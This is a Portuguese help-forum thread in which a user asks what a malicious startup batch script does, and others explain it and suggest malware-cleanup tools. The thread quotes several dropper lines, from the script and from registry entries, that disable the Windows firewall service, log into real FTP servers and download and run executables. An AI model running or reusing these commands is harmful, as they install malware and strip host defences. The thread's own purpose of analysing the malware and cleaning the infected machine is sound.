Script malicioso

Question

Ol&aacute;, amigos

Encontrei o codigo abaixo no inicializar de um micro, me parece que faz a transfer&ecirc;ncia do execut&aacute;vel 4.exe via ftp.

Gostaria de entender o que este c&oacute;digo realmente faz,

Fico grato por qualquer ajuda.

@echo off
@echo off>x
mode con: COLS=15 lines=10>x
@echo open 199.36.75.225>x
@echo 123>>x
@echo 123>>x
echo get c:\4.exe>>x
@echo bye>>X
@ftp -s:x
start C:\4.exe>>x

Answer

[quote=gvl, post: 6285254]Ol&aacute;, amigos

Encontrei o codigo abaixo no inicializar de um micro, me parece que faz a transfer&ecirc;ncia do execut&aacute;vel 4.exe via ftp.

Gostaria de entender o que este c&oacute;digo realmente faz,

Fico grato por qualquer ajuda.[/quote]
@echo off 
Desativa a exibi&ccedil;&atilde;o dos comandos na janela do Prompt

@echo off>x 
Redireciona o resultado do mesmo comando acima para o arquivo de nome x (para n&atilde;o exibir nada na tela)

mode con: COLS=15 lines=10>x
Diminui o tamanho da janela para ficar menos vis&iacute;vel (e redireciona a sa&iacute;da do comando para o arquivo x)

[COLOR=DeepSkyBlue]@echo open 199.36.75.225>x[/COLOR]
[COLOR=DeepSkyBlue] @echo 123>>x[/COLOR]
[COLOR=DeepSkyBlue] @echo 123>>x[/COLOR]
[COLOR=DeepSkyBlue] echo get c:\4.exe>>x[/COLOR]
[COLOR=DeepSkyBlue] @echo bye>>X[/COLOR] 
Esses comandos em azul s&atilde;o escritos para o arquivo de nome X para realizar:

abrir conex&atilde;o com o servidor FTP 199.36.75.225
mandar o nome de usu&aacute;rio 123 para fazer login
mandar a senha 123 para fazer login
pega o arquivo 4.exe do servidor e faz a transfer&ecirc;ncia para C:\
desconecta do servidor@ftp -s:x
Abre o cliente FTP do Windows e carrega os comandos a serem realizados (que est&atilde;o no arquivo x, que foram escritos no mesmo)

start C:\4.exe>>x
Inicia o execut&aacute;vel transferido do servidor FTP (e redireciona a saida para o arquivo x)

Apenas para constar, n&atilde;o consegui conex&atilde;o FTP com esse IP...

Answer

Salve, Salve amigo Meyer!

Muito obrigado pela resposta.

Abs, gvl :feliz:

Answer

Salve amigo Meyer! ,

Apenas para constar, no consegui conexo FTP com esse IP...

Olhando o hijackthis encontrei esta entrada no registro do Windows., aquele outro Ip realmente n&atilde;o esta mesmo funcionando.

O4 - HKLM\..\Run: [shell] c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 222.186.30.65 > cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 4.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&4.exe&4.exe&del cmd.txt /q /f&ex

Answer

[quote=gvl, post: 6289208]Salve amigo Meyer! ,

Olhando o hijackthis encontrei esta entrada no registro do Windows., aquele outro Ip realmente n&atilde;o esta mesmo funcionando.[/quote]
&Eacute; praticamente a mesma coisa que eu disse acima, mas tudo resumido s&oacute; em um comando (para abrir com o CMD, e os caracteres especiais de fun&ccedil;&otilde;es fazem a m&aacute;gica), mas tem uma coisa extra nesse script, ele desativa o acesso compartilhado (para compartilhar a internet). Esse IP tamb&eacute;m n&atilde;o vai.

Answer

Tem momentos que fica off, neste momento esta on-line e olhando tem 6 execut&aacute;veis neste FTP, cujo conteudo parecer ser modificado com frequencia.

Neste caso o Firewall do Windows e o Kaspersky do micro eram para barrar a transfer&ecirc;ncia destes execut&aacute;veis, correto ?

Temporariamente desativei o CMD do sevem, com isto estes comandos via prompt ser&atilde;o impedidos de serem executados ?

Um deles de algum modo cria uma conta de usu&aacute;rio no micro chamada ' 123 ',  como impedir o Sevem de criar contas de usu&aacute;rios al&eacute;m daquelas que j&aacute; existem no micro ?

&Eacute; que neste micro preciso de 3 contas e por azar as 3 precisam ter permiss&atilde;o de adminstrador.

Veja.
http://img525.imageshack.us/img525/6603/ftpf.th.jpg

Edit: no micro tem o Windows PowerShell, pelo visto apenas o bloqueio do cmd talvez n&atilde;o seje suficiente.

Answer

Ol&aacute;,

Como o t&oacute;pico &eacute; de 2012 pedi permiss&atilde;o para levanta-lo e dependendo do rumo que tomar pe&ccedil;o para algum moderador move-lo para outra sala se for o caso.

Depois de alguns meses de tr&eacute;gua, hoje achei mais alguns EXE estranhos no micro.

O CMD ( prompt de comando ) esta bloqueado no miro, mas mesmo assim o comando abaixo &eacute; executado.

A porta FTP esta bloqueada e mesmo assim ocorre a transfer&ecirc;ncia do .exe.

Achei um arquivo chamando dump.exe cujo cont&eacute;udo segue abaixo:

open 174.139.121.124
1005201757
3421363
get 1.exe
bye

Este aqui &eacute; o conte&uacute;do do 1.exe mencionado acima,

Kaspersky Anti-Virus 2013
    html,body{height:100%}  body{width:100%;min-height:100%;margin:0;padding:0;color:#2C2C2C;font:   normal 11px tahoma;background:#FFF} form{margin:0}  table,input,select{font:normal 100% tahoma} img{border:0;margin:0}  table{border-collapse:collap**** a{color:#62707D} .t,tr.t  td{vertical-align:top} .m{vertical-align:middle} .b,tr.b  td{vertical-align:bottom} tr.t td td,tr.b td td{vertical-align:auto}  .l{text-align:left} .c{text-align:center} .r{text-align:right}  .nobr{white-space:nowrap} .rel{position:relative}  .abs{position:absolute} .fl{float:left} .fr{float:right} .cl{clear:both}  .w100{width:100%} .h100{height:100%} big,.big{font-size:125%}  small,.small{font-size:95%} .micro{color:#DDD;font:normal 9px tahoma}  h1{font:bold 20px arial; margin:0} h4{font:bold 12px arial; margin:0}  p{text-align:justify;line-height:1.3;margin:0 0 0.5em 0} .z{border:1px  solid red} .h1px{height:1px;font-size:1px;line-height:1px} ul{margin:6px  0 6px 20px;padding:0} ul li{margin:3px 0}

Kaspersky
                                    Anti-Virus 2013
                                
                                ACESSO  NEGADO
                                No foi possvel  recuperar o URL solicitado  URL:
                                    http://www.ganchungeng.cn/123/1.exe  
                                    Bloqueado pelo Antivrus da  Web Motivo: URL perigoso  Clique  aqui se voc achar que a pgina da Web foi bloqueada  incorretamente.Mtodo de deteco: proteo em  nuvem
                                
                                    Mensagem  gerada em: 02:31:51

Tem um chamado 888.exe que n&atilde;o deu para abrir pelo bloco de notas.

Como posso bloquear a execu&ccedil;&atilde;o autom&aacute;tica destes scritps ?

Answer

Escreva netstat -an para descobrir a porta por onde esse malware faz a transfer&ecirc;ncia para o server FTP.

Abra&ccedil;os.

Answer

Movido de Programa&ccedil;&atilde;o, scripts, web e banco de dados

Answer

Salve, Salve amigo

Obrigado Jo&atilde;o Por mover o t&oacute;pico. :piscadela:

Henry-Keys, segue saida do comando.

Na lista abaixo tem como identificar qual porta foi usada ?

Proto  Endere&Dagger;o local         Endere&Dagger;o externo       Estado
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:554            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1110           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1433           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:2383           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:2869           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3128           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5357           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5800           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5900           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:8221           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:10243          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49155          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49158          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49159          0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1110         127.0.0.1:56960        ESTABLISHED
  TCP    127.0.0.1:1110         127.0.0.1:56962        ESTABLISHED
  TCP    127.0.0.1:1110         127.0.0.1:56964        ESTABLISHED
  TCP    127.0.0.1:1110         127.0.0.1:57465        TIME_WAIT
  TCP    127.0.0.1:1434         0.0.0.0:0              LISTENING
  TCP    127.0.0.1:14147        0.0.0.0:0              LISTENING
  TCP    127.0.0.1:49156        127.0.0.1:49157        ESTABLISHED
  TCP    127.0.0.1:49157        127.0.0.1:49156        ESTABLISHED
  TCP    127.0.0.1:56960        127.0.0.1:1110         ESTABLISHED
  TCP    127.0.0.1:56962        127.0.0.1:1110         ESTABLISHED
  TCP    127.0.0.1:56964        127.0.0.1:1110         ESTABLISHED
  TCP    192.168.0.252:139      0.0.0.0:0              LISTENING
  TCP    192.168.0.252:445      192.168.0.22:1116      ESTABLISHED
  TCP    192.168.0.252:445      192.168.0.25:61278     ESTABLISHED
  TCP    192.168.0.252:1433     192.168.0.12:50433     ESTABLISHED
  TCP    192.168.0.252:1433     192.168.0.12:61806     ESTABLISHED
  TCP    192.168.0.252:1433     192.168.0.22:1118      ESTABLISHED
  TCP    192.168.0.252:1433     192.168.0.25:52485     ESTABLISHED
  TCP    192.168.0.252:1433     192.168.0.25:61291     ESTABLISHED
  TCP    192.168.0.252:3128     192.168.0.3:4738       ESTABLISHED
  TCP    192.168.0.252:3128     192.168.0.8:1786       ESTABLISHED
  TCP    192.168.0.252:3128     192.168.0.14:1924      ESTABLISHED
  TCP    192.168.0.252:3128     192.168.0.14:1998      TIME_WAIT
  TCP    192.168.0.252:3389     192.168.0.254:22459    ESTABLISHED
  TCP    192.168.0.252:56961    78.141.179.18:443      ESTABLISHED
  TCP    192.168.0.252:56963    108.160.163.37:80      ESTABLISHED
  TCP    192.168.0.252:56965    108.160.163.52:80      ESTABLISHED
  TCP    192.168.0.252:57132    192.168.0.5:445        ESTABLISHED
  TCP    192.168.0.252:57467    4.28.136.36:80         TIME_WAIT
  TCP    [::]:80                [::]:0                 LISTENING
  TCP    [::]:135               [::]:0                 LISTENING
  TCP    [::]:445               [::]:0                 LISTENING
  TCP    [::]:554               [::]:0                 LISTENING
  TCP    [::]:1110              [::]:0                 LISTENING
  TCP    [::]:1433              [::]:0                 LISTENING
  TCP    [::]:2383              [::]:0                 LISTENING
  TCP    [::]:2869              [::]:0                 LISTENING
  TCP    [::]:3389              [::]:0                 LISTENING
  TCP    [::]:3587              [::]:0                 LISTENING
  TCP    [::]:5357              [::]:0                 LISTENING
  TCP    [::]:8221              [::]:0                 LISTENING
  TCP    [::]:10243             [::]:0                 LISTENING
  TCP    [::]:49152             [::]:0                 LISTENING
  TCP    [::]:49153             [::]:0                 LISTENING
  TCP    [::]:49154             [::]:0                 LISTENING
  TCP    [::]:49155             [::]:0                 LISTENING
  TCP    [::]:49158             [::]:0                 LISTENING
  TCP    [::]:49159             [::]:0                 LISTENING
  TCP    [::1]:1434             [::]:0                 LISTENING
  TCP    [::1]:14147            [::]:0                 LISTENING
  TCP    [fe80::3c47:7c51:4059:5ef0%13]:445  [fe80::d8c3:e6c2:db47:8b5b%13]:61791  ESTABLISHED
  UDP    0.0.0.0:500            *:*                    
  UDP    0.0.0.0:3130           *:*                    
  UDP    0.0.0.0:3401           *:*                    
  UDP    0.0.0.0:3544           *:*                    
  UDP    0.0.0.0:3702           *:*                    
  UDP    0.0.0.0:3702           *:*                    
  UDP    0.0.0.0:3702           *:*                    
  UDP    0.0.0.0:3702           *:*                    
  UDP    0.0.0.0:4500           *:*                    
  UDP    0.0.0.0:4827           *:*                    
  UDP    0.0.0.0:5004           *:*                    
  UDP    0.0.0.0:5005           *:*                    
  UDP    0.0.0.0:5355           *:*                    
  UDP    0.0.0.0:52720          *:*                    
  UDP    0.0.0.0:52722          *:*                    
  UDP    0.0.0.0:52724          *:*                    
  UDP    0.0.0.0:58683          *:*                    
  UDP    127.0.0.1:1900         *:*                    
  UDP    127.0.0.1:64944        *:*                    
  UDP    192.168.0.252:137      *:*                    
  UDP    192.168.0.252:138      *:*                    
  UDP    192.168.0.252:1900     *:*                    
  UDP    192.168.0.252:61989    *:*                    
  UDP    192.168.0.252:64943    *:*                    
  UDP    [::]:500               *:*                    
  UDP    [::]:3540              *:*                    
  UDP    [::]:3702              *:*                    
  UDP    [::]:3702              *:*                    
  UDP    [::]:3702              *:*                    
  UDP    [::]:3702              *:*                    
  UDP    [::]:4500              *:*                    
  UDP    [::]:5004              *:*                    
  UDP    [::]:5005              *:*                    
  UDP    [::]:5355              *:*                    
  UDP    [::]:52721             *:*                    
  UDP    [::]:52723             *:*                    
  UDP    [::]:52725             *:*                    
  UDP    [::1]:1900             *:*                    
  UDP    [::1]:64942            *:*                    
  UDP    [fe80::3c47:7c51:4059:5ef0%13]:546  *:*                    
  UDP    [fe80::3c47:7c51:4059:5ef0%13]:1900  *:*                    
  UDP    [fe80::3c47:7c51:4059:5ef0%13]:64941  *:*

Answer

[quote=gvl, post: 6576598]Ol&aacute;,

Como o t&oacute;pico &eacute; de 2012 pedi permiss&atilde;o para levanta-lo e dependendo do rumo que tomar pe&ccedil;o para algum moderador move-lo para outra sala se for o caso.

Depois de alguns meses de tr&eacute;gua, hoje achei mais alguns EXE estranhos no micro.

O CMD ( prompt de comando ) esta bloqueado no miro, mas mesmo assim o comando abaixo &eacute; executado.

A porta FTP esta bloqueada e mesmo assim ocorre a transfer&ecirc;ncia do .exe.

Achei um arquivo chamando dump.exe cujo cont&eacute;udo segue abaixo:

Este aqui &eacute; o conte&uacute;do do 1.exe mencionado acima,

Tem um chamado 888.exe que n&atilde;o deu para abrir pelo bloco de notas.

Como posso bloquear a execu&ccedil;&atilde;o autom&aacute;tica destes scritps ?[/quote]
O teu antiv&iacute;rus bloqueou o 1.exe :mostrando_dentes:

E bloquear n&atilde;o me lembro, talvez tenham ferramentas espec&iacute;ficas para tal :mostrando_dentes:

Answer

O teu antiv&iacute;rus bloqueou o 1.exe https://www.hardware.com.br/static/c/m/fed156de515dc1bd119c0b540c434597Mas pelo visto deixou coisa pior ser executada no micro.

Dando uma olha no registro do Windows achei algumas entradas estranhas, acabei chegando no log abaixo.

Agora me pergunto como o Kaspersky deixou passar  e como bloquear este tipo de instala&ccedil;&atilde;o sil&ecirc;nciosa ?

Fiz a desinstala&ccedil;&atilde;o, rodei o malwarebytes, o kaspersky, um limpador de registro em, seguida deletei as entradas no registro do windows.

2013-6-1 04:11:03 754  StartSlientIntall :(null)
2013-6-1 04:11:03 754  ExtraceFile begin...C:\Windows\system32\config\systemprofile\AppData\Local\liebao\
2013-6-1 04:11:03 754  GetPacketData 0
2013-6-1 04:11:03 879  GetPacketData return:20516394
2013-6-1 04:11:03 879  Extract...
2013-6-1 04:11:11 882  Extract return:1
2013-6-1 04:11:11 882  SetStartCheckDefaultBrowser start

2013-6-1 04:11:11 882  strAccountDir = C:\Windows\system32\config\systemprofile\AppData\Local\liebao\User Data\Default\Preferences

2013-6-1 04:11:11 882  WriteReg start
2013-6-1 04:11:11 882  WriteReg end
2013-6-1 04:11:11 882  Shortcut start
2013-6-1 04:11:11 882  IsCreateLink Start
2013-6-1 04:11:11 882  IsCreateLink strPid:6
2013-6-1 04:11:11 882  IsCreateLink bExist1:0 ,bExist2:0
2013-6-1 04:11:11 882  IsCreateLink strDesktopPath:C:\Users\Public\Desktop\
2013-6-1 04:11:11 882  IsCreateLink strDesktopPath:C:\Users\Public\Desktop\
2013-6-1 04:11:11 882  IsCreateLink End
2013-6-1 04:11:11 882  CreateShellLink start...
2013-6-1 04:11:11 929  CreateShellLink return:1, file:C:\Windows\system32\config\systemprofile\AppData\Local\liebao\LBBrowser\liebao.exe, cmd:, link:C:\Windows\system32\config\systemprofile\Desktop\
2013-6-1 04:11:12 194  CreateShellLink start...
2013-6-1 04:11:12 194  CreateShellLink return:1, file:C:\Windows\system32\config\systemprofile\AppData\Local\liebao\LBBrowser\liebao.exe, cmd:, link:C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
2013-6-1 04:11:12 194  CreateShellLink start...
2013-6-1 04:11:12 209  CreateShellLink return:1, file:C:\Windows\system32\config\systemprofile\AppData\Local\liebao\LBBrowser\uninst.exe, cmd:, link:C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
2013-6-1 04:11:12 209  Shortcut end
2013-6-1 04:11:12 209  StartSvr start
2013-6-1 04:11:12 443  StartSvr end
2013-6-1 04:11:12 443  install_Tencentdl start
2013-6-1 04:11:12 475  install_Tencentdl end
2013-6-1 04:11:12 475  RealInstallFunc Success
2013-6-1 04:11:12 475  Report start
2013-6-1 04:11:13 473  Report end
2013-6-1 04:11:13 473  path = C:\Windows\system32\config\systemprofile\AppData\Local\liebao\LBBrowser\liebao.exe,curpever = 3.0.14.3728,installver = 3.0.14.3728
2013-6-1 04:11:14 378  path = C:\Windows\system32\config\systemprofile\AppData\Local\liebao\LBBrowser\chrome.dll,curpever = 3.0.14.3728,installver = 3.0.14.3728
2013-6-1 04:11:14 378  OldDefaultBrowser=C:\Program Files\Internet Explorer\iexplore.exe -nohome
2013-6-1 04:14:23 310  StartSlientIntall :(null)
2013-6-1 04:14:23 310  OldDefaultBrowser=C:\Windows\system32\config\systemprofile\AppData\Local\liebao\LBBrowser\liebao.exe %1
2013-6-1 04:14:23 310  KFunction::RunApp CreateProcessW error:2, wait:-1, show:0, path:LBBrowser\liebao.exe, cmd:--make-default-browser
Aqui outro log chamado LocalState

{
   uninstall_metrics: {
      installation_date2: 1370070674,
      launch_count: 1
   },
   user_experience_metrics: {
      low_entropy_source: 7835,
      session_id: 0,
      stability: {
         breakpad_registration_fail: 0,
         breakpad_registration_ok: 0,
         crash_count: 0,
         debugger_not_present: 0,
         debugger_present: 0,
         exited_cleanly: true,
         incomplete_session_end_count: 0,
         last_timestamp_sec: 1370070674,
         launch_count: 1,
         launch_time_sec: 1370070674,
         page_load_count: 0,
         renderer_crash_count: 0,
         renderer_hang_count: 0,
         session_end_completed: true,
         stats_buildtime: 1357739645,
         stats_version: 3.0.14.3728-devel
      }
   }
}

Fiz a desativa&ccedil;&atilde;o do prompt de comando pelo gpedit.msc, fiz o bloqueio do powershell e mesmo assim veja o que achei no registro do windows.

Procurei pelo exe mencionado na entrada mas n&atilde;o achei, mas de qualquer forma fica a preocupa&ccedil;&atilde;o.

c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 220.180.147.33 > cmd.txt&echo 110>> cmd.txt&echo 110>> cmd.txt&echo binary >> cmd.txt&echo get 33.exe>> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&33.exe&33.exe&del cmd.txt /q /f

Answer

Os arquivos sugerem ser um worm.

O problema mais dif&iacute;cil &eacute;:

&Eacute; que neste micro preciso de 3 contas e por azar as 3 precisam ter permiss&atilde;o de adminstrador.

:veja: Baixe o [color=#800080]Norman Malware Cleaner[/color] e salve-o no Desktop (&Aacute;rea de Trabalho) 
 
*Execute-o e aceite o contrato 
 
*Clique [Start] 
 
https://www.hardware.com.br/static/c/m/5586ccbb64321d7627514f923dd07345  
 
*Ao t&eacute;rmino, cole o relat&oacute;rio Nmc_data_hor&aacute;rio.txt localizado no Desktop

Answer

Ol&aacute;, Wings

Norman Scanner Engine Version: 7.01.04
nvcbin.def: Version: 7.01.4644, Date: 2013/06/10 10:39:11, Variants: 20991153

Operating System: Windows 7

Switches: /iagree
Running without NSAK

Scan started: 2013/06/10 21:33:21

Running pre-scan cleanup routine...

Number of malicious objects found: 0
Number of malicious objects cleaned: 0
Scanning time: 1s

Scanning system for active rootkit activity...

Number of malicious objects found: 0
Number of malicious objects cleaned: 0
Number of malicious files found: 0
Number of malicious files cleaned: 0
Scanning time: 0s

Scanning running processes and process memory...

Number of files found: 760
Number of objects found: 8610
Number of objects scanned: 8610
Number of objects not scanned: 0
Number of malicious memory objects found: 0
Number of malicious objects cleaned: 0
Number of malicious files found: 0
Number of malicious files cleaned: 0
Scanning time: 2m 51s

Scanning system for FakeAV...

Number of malicious objects found: 0
Number of malicious objects cleaned: 0
Number of malicious files found: 0
Number of malicious files cleaned: 0
Scanning time: 0s

Running quick scan...

Number of files found: 0
Number of archives unpacked: 0
Number of objects found: 0
Number of objects scanned: 0
Number of objects not scanned: 0
Number of malicious objects found: 0
Number of malicious objects cleaned: 0
Number of malicious files found: 0
Number of malicious files cleaned: 0
Scanning time: 19s

Running post-scan cleanup routine...

Number of malicious objects found: 0
Number of malicious objects cleaned: 0
Scanning time: 0s

Results:
Total number of files found: 760
Total number of archives unpacked: 0
Total number of objects found: 8610
Total number of objects scanned: 8610
Total number of objects not scanned: 0
Total number of malicious objects found: 0
Total scanning time: 3m 11s

Answer

:veja: Delete o Norman Malware Cleaner e seu relat&oacute;rio

:veja: Baixe o [color=#800080]Zoek[/color] (...de [color=#0000FF]Smeenk[/color]) e salve-o no Desktop (&Aacute;rea de Trabalho) 
 
*Execute-o. Usu&aacute;rios do Windows Vista ou do Windows 7 devem clicar com o bot&atilde;o direito do mouse no arquivo e selecionar [color=#4169E1]Executar como administrador[/color] 
 
*Cole as linhas em [color=#8B0000]marron[/color] no espa&ccedil;o 
[color=#8B0000] 
startupall; 
autoclean; 
filesrcm; 
emptyalltemp; 
[/color] 
 
http://t.imgbox.com/adrEouIF.jpg  
 
*Clique [Run Script] 
 
*Aguarde o t&eacute;rmino....Pode demorar um pouco! 
 
*Caso a reinicializa&ccedil;&atilde;o do PC seja solicitada, clique [OK] para reiniciar 
 
http://t.imgbox.com/adhLuhkR.jpg

:veja: Acesse [color=#800080]este link[/color] 
 
*Clique [Selecionar arquivo...] 
 
*Localize o relat&oacute;rio C:\zoek-results.log e clique [Abrir] 
 
*Selecione 4 jours 
 
*Clique [Cr&eacute;er le lien Cjoint] 
 
https://www.hardware.com.br/static/c/m/fb405a606703ea7bf37880bb8770d9e7  
 
*Cole o link criado ao lado de Le lien a &eacute;t&eacute; cr&eacute;&eacute;: 
 
https://www.hardware.com.br/static/c/m/cae86b35b8d8683484b25434c8be7fc9

Kaspersky

Anti-Virus 2013

Ferramentas

Mover Tópico